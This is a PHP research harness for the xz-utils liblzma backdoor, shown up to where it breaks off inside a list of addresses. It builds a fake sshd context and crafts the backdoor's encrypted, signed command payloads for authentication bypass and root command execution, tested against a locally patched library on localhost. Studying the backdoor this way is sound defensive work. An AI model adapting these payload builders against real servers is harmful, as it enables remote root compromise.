<?php
/**
 * Copyright (C) 2024 Stefano Moioli <smxdev4@gmail.com>
 * 
 * this script uses the header generated by xzre (build/xzre.h)
 * to create a fake backdoor context.
 * it then uses this context to build and run payloads.
 */

use FFI\CData;
use phpseclib3\Common\Functions\Strings;
use phpseclib3\Crypt\Common\AsymmetricKey;
use phpseclib3\Crypt\Common\PublicKey as CommonPublicKey;
use phpseclib3\Crypt\EC;
use phpseclib3\Crypt\EC\Curves\Ed448;
use phpseclib3\Crypt\PublicKeyLoader;
use phpseclib3\Crypt\RSA;
use phpseclib3\Crypt\RSA\PrivateKey;
use phpseclib3\Crypt\RSA\PublicKey;
use phpseclib3\File\X509;
use phpseclib3\Math\BigInteger;
use phpseclib3\Net\SSH2;

require_once __DIR__ . '/vendor/autoload.php';
require_once __DIR__ . '/common.php';

define('O_ACCMODE',  00000003);
define('O_RDONLY',  00000000);
define('O_WRONLY',  00000001);
define('O_RDWR',  00000002);
define('O_CREAT',  00000100);        /* not fcntl */
define('O_EXCL',  00000200);        /* not fcntl */
define('O_NOCTTY',  00000400);        /* not fcntl */
define('O_TRUNC',  00001000);        /* not fcntl */
define('O_APPEND',  00002000);
define('O_NONBLOCK',  00004000);
define('O_SYNC',  00010000);
define('FASYNC',  00020000);        /* fcntl, for BSD compatibility */
define('O_DIRECT',  00040000);        /* direct disk access hint */
define('O_LARGEFILE',  00100000);
define('O_DIRECTORY',  00200000);        /* must be a directory */
define('O_NOFOLLOW',  00400000);        /* don't follow links */
define('O_NOATIME',  01000000);
define('O_CLOEXEC',  02000000);        /* set close_on_exec */
define('O_NDELAY',  O_NONBLOCK);

abstract class Flags1 {
    public const SETLOGMASK = 0x4;
    public const DISABLE_PAM = 0x40;
}

abstract class Flags2 {
    public const IMPERSONATE = 0x1;
    public const CHANGE_MONITOR_REQ = 0x2;
}

class Invoker {
    private FFI $ffi;
    private FFI $crypto;
    private FFI $syms;

    private function init_ffi(){
        $this->ffi = FFI::cdef(
            file_get_contents(__DIR__ . '/build/xzre.h'),
            __DIR__ . '/build/liblzma.so'
        );

        $this->crypto = FFI::cdef('
            typedef void BIGNUM, RSA, DSA, BIO, EVP_PKEY;

            RSA *RSA_new(void);
            void RSA_free(RSA *rsa);
            BIGNUM *BN_bin2bn(const unsigned char *s, int len, BIGNUM *ret);
            int BN_hex2bn(BIGNUM **a, const char *str);

            BIO *BIO_new_mem_buf(const void *buf, int len);
            RSA *PEM_read_bio_RSA_PUBKEY(BIO *bp, RSA **x, void *cb, void *u);
            DSA *PEM_read_bio_DSA_PUBKEY(BIO *bp, DSA **x, void *cb, void *u);
            EVP_PKEY *PEM_read_bio_PUBKEY(BIO *bp, EVP_PKEY **x, void *cb, void *u);

            char *ERR_error_string(unsigned long e, char *buf);
            unsigned long ERR_get_error(void);
            int RSA_size(const RSA *rsa);

            int BIO_free(BIO *a);
            ','libcrypto.so'
        );

        $this->syms = FFI::cdef('
            typedef unsigned int mode_t;

            void *dlsym(void *handle, const char *symbol);
            int mprotect(void *addr, size_t len, int prot);
            int getpagesize(void);
            int open(const char *pathname, int flags, mode_t mode);
            int close(int fd);
            '
        );
    }

    /**
     * @return CData
     */
    private function dlsym(string $sym){
        /** @var mixed */
        $ffi = $this->syms;
        return $ffi->dlsym(null, $sym);
    }

    private CData $nat_ctx;
    private CData $nat_imported_funcs;
    private CData $nat_libc_imports;
    private CData $nat_sshd_ctx;
    private CData $nat_sshd_log_ctx;
    private CData $nat_sshd_sensitive_data;
    private CData $nat_permit_root_login;
    private CData $nat_monitor_req_authpassword;
    private CData $nat_monitor_req_keyallowed;

    private CData $nat_host_keys;
    private CData $nat_host_pubkeys;
    private CData $nat_sshkey;
    private CData $nat_sshkey_pub;

    private CData $nat_STR_ssh_rsa_cert_v01_openssh_com;
    private CData $nat_STR_rsa_sha2_256;
    private CData $nat_monitor_ptr;
    private CData $nat_monitor_data;

    private $fd_ssh_out;
    private $fd_ssh_in;
    private $fd_ssh_log_out;
    private $fd_ssh_log_in;

    private function init_structures_part0(){
        $ffi = $this->ffi;
        $this->nat_ctx = $ffi->new('global_context_t');
        $this->nat_imported_funcs = $ffi->new('imported_funcs_t');
        $this->nat_libc_imports = $ffi->new('libc_imports_t');
        $this->nat_sshd_ctx = $ffi->new('sshd_ctx_t');
        $this->nat_sshd_log_ctx = $ffi->new('sshd_log_ctx_t');
        $this->nat_sshd_sensitive_data = $ffi->new('struct sensitive_data', false);
        $this->nat_permit_root_login = $ffi->new('int');
        
        $this->nat_monitor_req_keyallowed = make_array(4+4+8);
        $this->nat_monitor_req_authpassword = make_array(4 + 4 + 8);
        $data = encode_data(4, 22);
        FFI::memcpy(FFI::addr($this->nat_monitor_req_keyallowed), $data, strlen($data));

        $this->nat_permit_root_login->cdata = 0; // PERMIT_NO
        $this->nat_sshd_ctx->permit_root_login_ptr = FFI::addr($this->nat_permit_root_login);

        $monitor_req_authpassword_ptr = FFI::cast('uintptr_t', FFI::addr($this->nat_monitor_req_authpassword));
        $monitor_req_authpassword_ptr->cdata += 4 + 4;
        $monitor_req_keyallowed_ptr = FFI::cast('uintptr_t', FFI::addr($this->nat_monitor_req_keyallowed));
        $monitor_req_keyallowed_ptr->cdata += 4 + 4;

        $this->nat_sshd_ctx->mm_answer_authpassword_ptr = FFI::cast('void *', $monitor_req_authpassword_ptr);
        $this->nat_sshd_ctx->mm_answer_keyallowed_ptr = FFI::cast('void *', $monitor_req_keyallowed_ptr);
        $this->nat_sshd_ctx->have_mm_answer_keyallowed = 1;
        $this->nat_sshd_ctx->have_mm_answer_authpassword = 1;
        $this->nat_sshd_ctx->have_mm_answer_keyverify = 1;
        $this->nat_sshd_ctx->mm_answer_authpassword_hook = function($ssh, $sock, $buf){
            print("-- mm_answer_authpassword_hook invoked\n");
            return 0;
        };

        $this->nat_STR_ssh_rsa_cert_v01_openssh_com = make_bytearray("ssh-rsa-cert-v01@openssh.com\x00");
        $this->nat_STR_rsa_sha2_256 = make_bytearray("rsa-sha2-256\x00");

        $this->nat_ctx->STR_ssh_rsa_cert_v01_openssh_com = FFI::cast('char *', FFI::addr($this->nat_STR_ssh_rsa_cert_v01_openssh_com));
        $this->nat_ctx->STR_rsa_sha2_256 = FFI::cast('char *', FFI::addr($this->nat_STR_rsa_sha2_256));

        $this->nat_ctx->num_shifted_bits = ED448_KEY_SIZE * 8;
        $this->nat_ctx->imported_funcs = FFI::addr($this->nat_imported_funcs);
        $this->nat_ctx->libc_imports = FFI::addr($this->nat_libc_imports);
        $this->nat_ctx->sshd_log_ctx = FFI::addr($this->nat_sshd_log_ctx);
        $this->nat_ctx->sshd_ctx = FFI::addr($this->nat_sshd_ctx);
        
        $this->nat_monitor_ptr = make_array(8);
        $this->nat_monitor_data = $ffi->new('struct monitor');
        writeptr(FFI::addr($this->nat_monitor_ptr), FFI::addr($this->nat_monitor_data));

        /** @var mixed */
        $syms = $this->syms;
        $this->fd_ssh_out = $syms->open('ssh_out.bin', O_CREAT|O_RDWR|O_TRUNC, 0666);
        $this->fd_ssh_in = $syms->open('ssh_in.bin', O_CREAT|O_RDWR|O_TRUNC, 0666);
        $this->fd_ssh_log_out = $syms->open('ssh_out_log.bin', O_CREAT|O_RDWR|O_TRUNC, 0666);
        $this->fd_ssh_log_in = $syms->open('ssh_in_log.bin', O_CREAT|O_RDWR|O_TRUNC, 0666);

        /*
        $this->nat_monitor_data->m_recvfd = 1;
        $this->nat_monitor_data->m_sendfd = 0;
        
        $this->nat_monitor_data->m_log_recvfd = 1;
        $this->nat_monitor_data->m_log_sendfd = 0;
        */
        $this->nat_monitor_data->m_recvfd = $this->fd_ssh_out;
        $this->nat_monitor_data->m_sendfd = $this->fd_ssh_in;
        $this->nat_monitor_data->m_log_recvfd = $this->fd_ssh_log_out;
        $this->nat_monitor_data->m_log_sendfd = $this->fd_ssh_log_in;
        
        $this->nat_monitor_data->m_pkex = NULL;
        $this->nat_monitor_data->m_pid = getmypid();
        $this->nat_monitor_ptr = FFI::new('void *[1]');
        $this->nat_monitor_ptr[0] = FFI::addr($this->nat_monitor_data);

        $this->nat_ctx->struct_monitor_ptr_address = FFI::cast('void *', FFI::addr($this->nat_monitor_ptr));

        
        /** init imported functions */
        foreach(['RSA_public_decrypt', 'EVP_PKEY_set1_RSA', 
        'DSA_get0_pqg', 'DSA_get0_pub_key',
        'EC_POINT_point2oct', 'EC_KEY_get0_public_key',
        'EC_KEY_get0_group', 'EVP_sha256', 'RSA_get0_key', 'BN_num_bits',
        'EVP_PKEY_new_raw_public_key', 'EVP_MD_CTX_new', 'EVP_DigestVerifyInit',
        'EVP_DigestVerify', 'EVP_MD_CTX_free', 'EVP_PKEY_free', 'EVP_CIPHER_CTX_new',
        'EVP_DecryptInit_ex', 'EVP_DecryptUpdate', 'EVP_DecryptFinal_ex', 'EVP_CIPHER_CTX_free',
        'EVP_chacha20', 'RSA_new', 'BN_dup', 'BN_bin2bn', 'RSA_set0_key',
        'EVP_Digest', 'RSA_sign', 'BN_bn2bin', 'RSA_free', 'BN_free'
        ] as $fn){
            $addr = $this->dlsym($fn);
            if($addr == null) throw new RuntimeException();
            $this->nat_imported_funcs->{$fn} = $addr;
        }
        /** init libc functions  */
        foreach([
            'getuid', 'exit', 'malloc_usable_size',
            'setresuid', 'setresgid', 'system', 'pselect', 'setlogmask',
            '__errno_location', 'write', 'read', 'shutdown', '__libc_stack_end'
        ] as $fn){
            $addr = $this->dlsym($fn);
            if($addr == null) throw new RuntimeException();
            $this->nat_libc_imports->{$fn} = $addr;
        }

        /** encrypt the ED public key, and store it in the secret data field  */
        $pubkey_data = $this->ed448_pubkey->getEncodedCoordinates();
        $secret_data = secret_data_crypto($pubkey_data, OP_ENCRYPT);
        FFI::memcpy($this->nat_ctx->secret_data, $secret_data, strlen($secret_data));
    }

    private function init_structures_part1(){                    
        /**
         * store the host key and host pub key
         * host key is unused. we fill it with a copy of the public key since the backdoor checks
         * that the number of host keys matches the number of host public keys
         * NOTE: must pass persistent: true, so that malloc is used instead of emalloc.
         * otherwise, `malloc_usable_size` will segfault
         */
        /** @var mixed */
        $ffi = $this->ffi;

        $this->nat_host_keys = $ffi->new(FFI::arrayType(
            $ffi->type('struct sshkey *'), [1]), false, true);

        $this->nat_host_pubkeys = $ffi->new(FFI::arrayType(
            $ffi->type('struct sshkey *'), [1]), false, true);

        $key = $ffi->new($ffi->type('struct sshkey'));
        $key->type = 0; // KEY_RSA
        $key->rsa = $this->nat_ssh_hostkey_pub;
        $this->nat_sshkey = $key;
        $this->nat_host_keys[0] = FFI::addr($this->nat_sshkey);

        $pubkey = $ffi->new($ffi->type('struct sshkey'));
        $pubkey->type = 0; // KEY_RSA
        $pubkey->rsa = $this->nat_ssh_hostkey_pub;
        $this->nat_sshkey_pub = $pubkey;
        $this->nat_host_pubkeys[0] = FFI::addr($this->nat_sshkey_pub);

        /** 
         * fill sshd_sensitive_data
         */
        $this->nat_sshd_sensitive_data->host_keys = $this->nat_host_keys;
        $this->nat_sshd_sensitive_data->host_pubkeys = $this->nat_host_pubkeys;
        $this->nat_sshd_sensitive_data->have_ssh2_key = 1;
        $this->nat_ctx->sshd_sensitive_data = FFI::addr($this->nat_sshd_sensitive_data);
    }

    private \phpseclib3\Crypt\EC\PrivateKey $ed448_privkey;
    private \phpseclib3\Crypt\EC\PublicKey $ed448_pubkey;

    private function init_ed448_key(){
        $privkey_path = path_combine(__DIR__, 'ed448_key.pem');

        if(!file_exists($privkey_path)){
            /** create Ed448 private and public key pairs */
            // $privkey = EC::createKey('Ed448');
            // file_put_contents($privkey_path, $privkey->toString('PKCS8'));
            $der = hex2bin('3047020100300506032B6571043B0420') . str_repeat("\x00", ED448_KEY_SIZE);
            file_put_contents($privkey_path, der2pem($der, 'PRIVATE KEY'));
        }
        $privkey = EC::load(file_get_contents($privkey_path));

        $this->ed448_privkey = $privkey;
        $this->ed448_pubkey = $privkey->getPublicKey();
    }

    /**
     * @return CData
     */
    private function nat_openssl_pkcs8_load(CommonPublicKey $public_key){
        $pem = $public_key->toString('PKCS8');

        /** @var mixed */
        $ffi = $this->crypto;
        $handle = $ffi->new('void *');

        $buf = make_array(strlen($pem));
        FFI::memcpy($buf, $pem, strlen($pem));
        $bio = $ffi->BIO_new_mem_buf($buf, strlen($pem));
        if($public_key instanceof \phpseclib3\Crypt\RSA\PublicKey){
            $nat_key = $ffi->PEM_read_bio_RSA_PUBKEY($bio, FFI::addr($handle), null, null);
        } else {
            $nat_key = $ffi->PEM_read_bio_DSA_PUBKEY($bio, FFI::addr($handle), null, null);
        }
        $ffi->BIO_free($bio);
        return $nat_key;
    }

    private ?CData $nat_ssh_hostkey_pub = null;
    private string $ssh_hostkey_digest;

    private function init_ssh_hostkey(?AsymmetricKey $hostkey = null){
        if($hostkey === null){
            /** create fake RSA key */
            $hostkey = RSA::loadPublicKey([
                'n' => new BigInteger(1337),
                'e' => new BigInteger(3)
            ]);
        } else {
            if($hostkey instanceof phpseclib3\Crypt\EC\PublicKey){
                $curve = $hostkey->getCurve();
                if($curve == 'Ed25519'){
                    $data = pack('V', 0x20000000) . $hostkey->getEncodedCoordinates();
                    $this->ssh_hostkey_digest = hash('sha256', $data, true);
                    return;
                }
            }
        }

        /** load host key into an OpenSSL RSA key structure */
        $this->nat_ssh_hostkey_pub = $this->nat_openssl_pkcs8_load($hostkey);

        /** obtain hostkey hash */
        $buf = make_array(SHA256_DIGEST_SIZE);
        
        /** @var mixed */
        $ffi = $this->ffi;

        $res = false;
        if($hostkey instanceof PublicKey){
            $res = $ffi->rsa_key_hash($this->nat_ssh_hostkey_pub, $buf, SHA256_DIGEST_SIZE, $this->nat_ctx->imported_funcs);
        } else {
            $res = $ffi->dsa_key_hash($this->nat_ssh_hostkey_pub, $buf, SHA256_DIGEST_SIZE, FFI::addr($this->nat_ctx));
        }
        if(!$res){
            error("key_hash FAILED");
            die;
        }
        $this->ssh_hostkey_digest = cdata_bytes($buf);
    }

    private function payload_make_header(int $cmd_type){
        return pack('VVP', 1, $cmd_type, 0);
    }

    private function payload_make_args(int $flags1, int $flags2, int $flags3, int $size_field){
        $args = $this->ffi->new('cmd_arguments_t');
        $args->flags1 = $flags1;
        $args->flags2 = $flags2;
        $args->flags3 = $flags3;
        $args->u->size = $size_field;
        return cdata_bytes($args);
    }

    private function payload_make_signature(int $cmd_type, string $packet){
        $signed_data = (''
            . encode_data(4, $cmd_type)
            . $packet
            . $this->ssh_hostkey_digest
        );
        $signature = $this->ed448_privkey->sign($signed_data);
        return $signature;
    }

    private function payload_make(int $cmd_type, string $packet){
        $payload_hdr = $this->payload_make_header($cmd_type);
        $packet_sig = $this->payload_make_signature($cmd_type, $packet);
        
        $payload_body = (''
            . $packet_sig
            . $packet
        );

        //say('sig: ' . bin2hex($packet_sig));
        say('payload_body: ' . bin2hex($payload_body));

        $pubkey_data = $this->ed448_pubkey->getEncodedCoordinates();

        // use header as IV
        $ivec = substr($payload_hdr, 0, CHACHA20_IV_SIZE);
        // use public key as encryption key
        $key = substr($pubkey_data, 0, CHACHA20_KEY_SIZE);
        $payload_body_encrypted = openssl_encrypt($payload_body, 'chacha20', $key, OPENSSL_RAW_DATA, $ivec);
       
        $final = (''
            . $payload_hdr
            . $payload_body_encrypted
        );
        $final = str_pad($final, 256, "\x00", STR_PAD_RIGHT);
        return $final;
    }

    private function payload_make_bypass_auth(){
        $cmd_type = 3;
        $packet = (''
            . $this->payload_make_args(0, 0x4, 0x20, 0)
            . str_repeat("\x00", 0x30)
        );
        return $this->payload_make($cmd_type, $packet);
    }

    private function payload_make_exec(string $shell_cmd, int $uid = 0, int $gid = 0){
        $cmd_type = 2;

        $flags1 = Flags1::DISABLE_PAM /*| Flags1::SETLOGMASK*/;
        $flags2 = Flags2::CHANGE_MONITOR_REQ; 
        $flags3 = 22; // MONITOR_REQ_KEYALLOWED

        $extra_data = '';

        if($uid != 0 || $gid != 0){
            $flags2 |= Flags2::IMPERSONATE;
            $extra_data .= (''
                . encode_data(4, $uid)
                . encode_data(4, $gid)
            );
        }

        $packet = (''
            . $this->payload_make_args($flags1, $flags2, $flags3, strlen($shell_cmd) + 1)
            . $extra_data
            . $shell_cmd . "\x00"
        );
        return $this->payload_make($cmd_type, $packet);
    }

    private function payload_make_patch(){
        $cmd_type = 1;
        $packet = (''
            . $this->payload_make_args(0, 0, 0, 0)
        );
        return $this->payload_make($cmd_type, $packet);
    }

    private function payload_encode_private(string $payload){
        $one = new BigInteger(1);

        $n = new BigInteger(bin2hex($payload), 16);

        $e = new BigInteger(3);
        $p = new BigInteger(1);
        $q = clone $n;
        $d = $e->modInverse($p->subtract($one)->multiply($q->subtract($one)));
        $pkey = RSA::loadPrivateKey([
            'n' => $n,
            'e' => $e,
            'p' => $p,
            'q' => $q,
            'd' => $d
        ]);

        return $pkey;
    }

    private function payload_encode(string $payload){
        /** generate payload and convert to PEM */
        $pkey = RSA::loadPublicKey([
            'n' => new BigInteger(bin2hex($payload), 16),
            'e' => new BigInteger(3)
        ]);


        /** load PEM into an OpenSSL RSA key structure */
        $rsa_key = $this->nat_openssl_pkcs8_load($pkey);
        return $rsa_key;
    }

    private function init(){
        $this->init_ffi();
        $this->init_ed448_key();
        $this->init_structures_part0();
        $this->init_ssh_hostkey();
        $this->init_structures_part1();

        $data_dir = $this->gdb_file();
        if(!file_exists($data_dir)){
            mkdir($data_dir);
        }
    }

    
    public function __construct(){
        $this->init();
    }

    private function backdoor_invoke(string $payload){
        /** clear the backdoor disable flag, in case it's set **/
        $this->nat_ctx->disable_backdoor = 0;

        $payload_rsa_key = $this->payload_encode($payload);
        say('');

        /** @var mixed */
        $ffi = $this->ffi;
        $run_orig = $ffi->new('int');
        $res = $ffi->run_backdoor_commands($payload_rsa_key, FFI::addr($this->nat_ctx), FFI::addr($run_orig));
        say("res: {$res}, run_orig: {$run_orig}");

        $this->nat_RSA_free($payload_rsa_key);
    }

    public function cmd_bypass_auth(){
        $payload = $this->payload_make_bypass_auth();
        say("permit_root_login: {$this->nat_permit_root_login->cdata}");
        $this->backdoor_invoke($payload);
        say("permit_root_login: {$this->nat_permit_root_login->cdata}");
    }

    public function cmd_patch_sshd(){
        $payload = $this->payload_make_patch();

        say("permit_root_login: {$this->nat_permit_root_login->cdata}");
        $this->backdoor_invoke($payload);
        say("permit_root_login: {$this->nat_permit_root_login->cdata}");
    }

    public function cmd_system(string $command){
        $payload = $this->payload_make_exec($command);
        $this->backdoor_invoke($payload);
    }

    private function getpagesize(){
        /** @var mixed */
        $ffi = $this->syms;
        $pagesz = $ffi->getpagesize();
        return $pagesz;
    }

    private function nat_unprotect(CData $addr, int $size){
        /** @var mixed */
        $ffi = $this->syms;

        $pagesz = $ffi->getpagesize();
		$size = align_up($size, $pagesz);
    
        $val = FFI::cast('uintptr_t', $addr);
        $val->cdata = align_down($val->cdata, $pagesz);
        $ptr = FFI::cast('void *', $val);
        return $ffi->mprotect($ptr, $size, 7);
    }

    public function debug_place_breakpoints(int ...$addrs){
        /** @var mixed */
        $ffi = $this->ffi;
        $ptr1 = $ffi->run_backdoor_commands;

        $this->nat_unprotect($ffi->run_backdoor_commands, $this->getpagesize());
    
        $code = "\xeb\xfe\x90\x90";
        FFI::memcpy($ptr1, $code, strlen($code));
    
        $pid = getmypid();
        $base = 0x9490;

        $inspect_sigcheck = <<<'EOS'
        # b verify_signature
        # commands
        # x/50xb $rsi
        # printf "payload_body_size: %u\n", $rdx
        # printf "signed_data_size: %u\n", $rcx
        # end
        b sshd_get_client_socket
        
        EOS;

        $gdbinit = <<<EOS
        attach {$pid}
        set disassembly-flavor intel
        set pagination off

        define dump_cont
        x/20xb \$pc
        c
        end
        {$inspect_sigcheck}

        EOS;

        foreach($addrs as $bp){
            $offset = $bp - $base;

            $gdbinit .= "b *(run_backdoor_commands + {$offset})\n";
        }

        $gdbinit.= <<<EOS
        set \$pc += 2
        c
        set pagination on
        layout asm

        EOS;

        file_put_contents('gdbinit.txt', $gdbinit);
    }

    private function nat_RSA_free(CData $rsa_key){
        /** @var mixed */
        $ffi = $this->crypto;
        $ffi->RSA_free($rsa_key);
    }

    public function __destruct(){
        if($this->nat_ssh_hostkey_pub !== null){
            $this->nat_RSA_free($this->nat_ssh_hostkey_pub);
        }
    }

    private function gdb_kill_listeners(){
        $sshd_proc = rtrim(shell_exec(''
        . 'netstat -tanop'
        . '|grep -Po "^tcp\s.*:2022\s.*LISTEN.*"'
        . '|head -n1'
        . '|perl -pe "s|.*?LISTEN\s+||g"'
        ));
        if(empty($sshd_proc)) return;
        list($pid, $_) = explode('/', $sshd_proc);
        posix_kill($pid, SIGKILL);
    }

    private bool $gdb_sshd_fork = true;
    private bool $gdb_wait_loop = false;

    private function gdb_start_sshd(){
        file_put_contents('/tmp/sshd_config', <<<EOS
        Port 2022
        LogLevel Debug3
        KbdInteractiveAuthentication no
        UsePAM yes
        X11Forwarding yes
        PrintMotd no
        AcceptEnv LANG LC_*
        Subsystem       sftp    /usr/lib/openssh/sftp-server

        EOS);

        $file_pid_main = path_combine(__DIR__, 'gdb', 'pid_main');
        $file_pid_file = path_combine(__DIR__, 'gdb', 'pid');
        
        if(file_exists($file_pid_main)) unlink($file_pid_main);
        if(file_exists($file_pid_file)) unlink($file_pid_file);

        say('starting sshd');
        $gdb = proc_open(
            ['gdb', '-x', path_combine(__DIR__, 'gdb/run_sshd.gdb')],
            [], $p,
            __DIR__,
            ['GDB_DETACH' => '1',
            'GDB_WAIT_LOOP' => $this->gdb_wait_loop ? '1' : '0']
        );

        for(;;usleep(1000)){
            if(file_exists($file_pid_main)){
                $pid_main = intval(file_get_contents($file_pid_main));
                unlink($file_pid_main);

                // break endless loop
                say('sending sigint');
                posix_kill($pid_main, SIGINT);
                continue;
            }
            if(!file_exists($file_pid_file)){
                continue;
            }
            $sshd_pid = intval(file_get_contents($file_pid_file));
            break;
        }

        proc_close($gdb);
        return $sshd_pid;
    }

    private function gdb_attach_sshd(int $sshd_pid){
        $gdb = rtrim(shell_exec('which gdb'));
        $env = getenv();
        $env['GDB_TARGET'] = $sshd_pid;
        if($this->gdb_sshd_fork){
            $env['GDB_OPMODE'] = 'child';
        }

        pcntl_exec($gdb,
            ['-x', path_combine(__DIR__, 'gdb/sshd_child.gdb')],
            $env);
    }

    private function gdb_file(string ...$parts){
        return path_combine(__DIR__, 'gdb', ...$parts);
    }

    private function patch_liblzma(){
        $fname = '/usr/lib/x86_64-linux-gnu/liblzma.so.5.6.1';
        $orig_hash = '7ae37dfaf5cf7f6568ad00915a665cbd2486c50d63d1ad1d1afed771503f04d0376b95072f2b663d0a82692edecd668b2500b82309abdf8772a3345f13ffe02b';

        $data = file_get_contents($fname);
        if(hash('sha512', $data) !== $orig_hash){
            throw new RuntimeException();
        }

        // secret_data_get_decrypted
        $pos = strpos($data, hex2bin('F30F1EFA4885FF0F848E000000415455'));
        if($pos === false) throw new RuntimeException;

        $pubkey_data = $this->ed448_pubkey->getEncodedCoordinates();

        if(true){
            $patch = (''
                . "\x48\x8d\x35" . pack('V', 0xC) // lea rsi,[rip+0xc]
                . "\xb9" . pack('V', 57) // mov ecx, 57
                . "\xf3\xa4" // rep movsb
                . "\x31\xc0" // xor eax, eax
                . "\xff\xc0" // inc eax
                . "\xc3" // ret
                . $pubkey_data
            );
            $data = patch_data($data, $pos, $patch);

            // process_is_sshd
            $pos = strpos($data, hex2bin('554889E54157415641554154534883EC2848897DB84839F5'));
            if($pos === false) throw new RuntimeException;

            $patch = (''
                . "\x31\xc0" // xor eax, eax
                . "\xff\xc0" // inc eax
                . "\xc3" // ret
            );
            $data = patch_data($data, $pos, $patch);
        }

        if(false){
            // mm_answer_keyallowed_hook
            $pos = strpos($data, hex2bin('F30F1EFA415741564155415455534881EC28010000'));
            if($pos === false) throw new RuntimeException;
            $patch = "\xEB\xFE\x90\x90";
            $data = patch_data($data, $pos, $patch);
        }

        $lib_dir = '/tmp/xzre';
        if(!file_exists($lib_dir)) mkdir($lib_dir);

        $lib_name = basename($fname);
        symlink($lib_name, path_combine($lib_dir, 'liblzma.so.5'));
        symlink($lib_name, path_combine($lib_dir, 'liblzma.so'));

        if($this->gdb_wait_loop){
            // backdoor_setup
            $pos = strpos($data, hex2bin('F30F1EFA415731C04989FFB956020000'));
            if($pos === false) throw new RuntimeException;

            $patch = (''
                // int 3, nop (replaces endbr64)
                //. "\xCC\x90\x90\x90"
                . "\xEB\xFE\x90\x90"
            );
            $data = patch_data($data, $pos, $patch);
        }

        file_put_contents(
            path_combine($lib_dir, $lib_name),
            $data);
    }

    private function debug_disable_aslr(){
        file_put_contents('/proc/sys/kernel/randomize_va_space', "0\n");
    }

    public function ssh_client_main(){
        $ssh = new SSH2('localhost', 22);
        $hostKey = PublicKeyLoader::load($ssh->getServerPublicHostKey());
        $this->init_ssh_hostkey($hostKey);

        /** write payload, RSA-encoded */
        $payload = $this->payload_make_exec('id > /tmp/out.txt');

        /** @var PrivateKey */
        $pkey = $this->payload_encode_private($payload);
        file_put_contents($this->gdb_file('id_rsa'), $pkey->toString('OPENSSH'));

        /** @var PublicKey */
        $pub = $pkey->getPublicKey();
        file_put_contents($this->gdb_file('id_rsa.pub'), $pub->toString('OPENSSH'));

        file_put_contents($this->gdb_file('n.bin'), $payload);

        /** @var PrivateKey */
        $ssh_sign_key = $pkey
            ->withPadding(RSA::SIGNATURE_PKCS1)
            ->withHash('sha512');


        $cert_type = 'ssh-rsa-cert-v01@openssh.com';
        $nonce = openssl_random_pseudo_bytes(32);

        $raw_pub = $pub->toString('RAW');

        $extensions = (''
            . Strings::packSSH2('ss', 'permit-X11-forwarding', '')
            . Strings::packSSH2('ss', 'permit-agent-forwarding', '')
            . Strings::packSSH2('ss', 'permit-port-forwarding', '')
            . Strings::packSSH2('ss', 'permit-pty', '')
            . Strings::packSSH2('ss', 'permit-user-rc', '')
        );
        $encoded_sign_key = Strings::packSSH2('sii', 'ssh-rsa', $raw_pub['e'], $raw_pub['n']);
        $principals = Strings::packSSH2('s', 'nobody');

        $time_from = time() - 60;
        $time_to = time() + 86400;

        $dummy = RSA::createKey(2048);
        $raw_dummy = $dummy->getPublicKey()->toString('RAW');

        $packet = (''
            . Strings::packSSH2('s', $cert_type)
            . Strings::packSSH2('s', $nonce)
            /** public exponent and modulus (ignored by payload, which uses the signing key) */
            . Strings::packSSH2('i', $raw_dummy['e'])
            . Strings::packSSH2('i', $raw_dummy['n'])
            . Strings::packSSH2('Q', 0) // serial
            . Strings::packSSH2('N', 1) // SSH_CERT_TYPE_USER
            . Strings::packSSH2('s', 'Client') // key id
            . Strings::packSSH2('s', $principals) // valid principals
            . Strings::packSSH2('Q', $time_from)
            . Strings::packSSH2('Q', $time_to)
            . Strings::packSSH2('s', '') // critical options
            . Strings::packSSH2('s', $extensions)
            . Strings::packSSH2('s', '') // reserved
            /** public key of the signing key (contains payload) */
            . Strings::packSSH2('s', $encoded_sign_key)
        );
        $packet_sig = $ssh_sign_key->sign($packet);
        $packet_sig_enc = Strings::packSSH2('ss', 'rsa-sha2-512', $packet_sig);
        $packet .= Strings::packSSH2('s', $packet_sig_enc);

        file_put_contents($this->gdb_file('id_rsa-cert2.bin'), $packet);
        file_put_contents($this->gdb_file('id_rsa-cert2.pub'), (''
            . $cert_type
            . ' ' . base64_encode($packet)
            . ' ' . 'phpseclib-generated-key'
            . "\n"
        ));

        //$sshd_port = 22;
        $sshd_port = 2022;

        say('running ssh client');
        $ssh = rtrim(shell_exec('which ssh'));

        $envp = getenv();
        // patch to disable signature verification of backdoor certificate
        $envp['LD_PRELOAD'] = path_combine(__DIR__, 'build', 'libssh_patch.so');
        pcntl_exec($ssh, [
            '-vvvv',
            '-i', $this->gdb_file('id_rsa-cert2.pub'),
            '-p', $sshd_port,
            'root@localhost'
        ], $envp);
    }

    public function ssh_server_main(){
        $this->debug_disable_aslr();
        $this->patch_liblzma();
        $this->gdb_kill_listeners();
        $sshd_pid = $this->gdb_start_sshd();
        if($sshd_pid === false) throw new RuntimeException();
        // does not return
        $this->gdb_attach_sshd($sshd_pid);
        die;
    }
}

$invoker = new Invoker;

if($argc > 1){
    switch($argv[1]){
        case '-server':
            chdir(__DIR__);
            $invoker->ssh_server_main();
            exit(0);
        case '-client':
            chdir(__DIR__);
            $invoker->ssh_client_main();
            exit(0);
    }
}


$run_backdoor_commands = 0x9490;
$jmp_bad_data = [
    $run_backdoor_commands+0x5FC, $run_backdoor_commands+0x60D, $run_backdoor_commands+0x654, $run_backdoor_commands+0x684,
    $run_backdoor_commands+0x6B0, $run_backdoor_commands+0x70F, $run_backdoor_commands+0x722, $run_backdoor_commands+0x733,
    $run_backdoor_commands+0x806, $run_backdoor_commands+0x814, $run_backdoor_commands+0x820, $run_backdoor_commands+0x82C,
    $run_backdoor_commands+0x842, $run_backdoor_commands+0x84D, $run_backdoor_commands+0x856, $run_backdoor_commands+0x870,
    $run_backdoor_commands+0x87F, $run_backdoor_commands+0x890, $run_backdoor_commands+0x8A6, $run_backdoor_commands+0x8AF,
    $run_backdoor_commands+0x8FE, $run_backdoor_commands+0x91F, $run_backdoor_commands+0x92C, $run_backdoor_commands+0x937,
    $run_backdoor_commands+0x942, $run_backdoor_commands+0x99F, $run_backdoor_commands+0x9AC, $run_backdoor_commands+0x9B9,
    $run_backdoor_commands+0x9D6, $run_backdoor_commands+0x9EB, $run_backdoor_commands+0xA08, $run_backdoor_commands+0xA30,
    $run_backdoor_commands+0xA41, $run_backdoor_commands+0xAB0, $run_backdoor_commands+0xACF, $run_backdoor_commands+0xAF4,
    $run_backdoor_commands+0xB0C, $run_backdoor_commands+0xB1C, $run_backdoor_commands+0xB3F, $run_backdoor_commands+0xB5E,
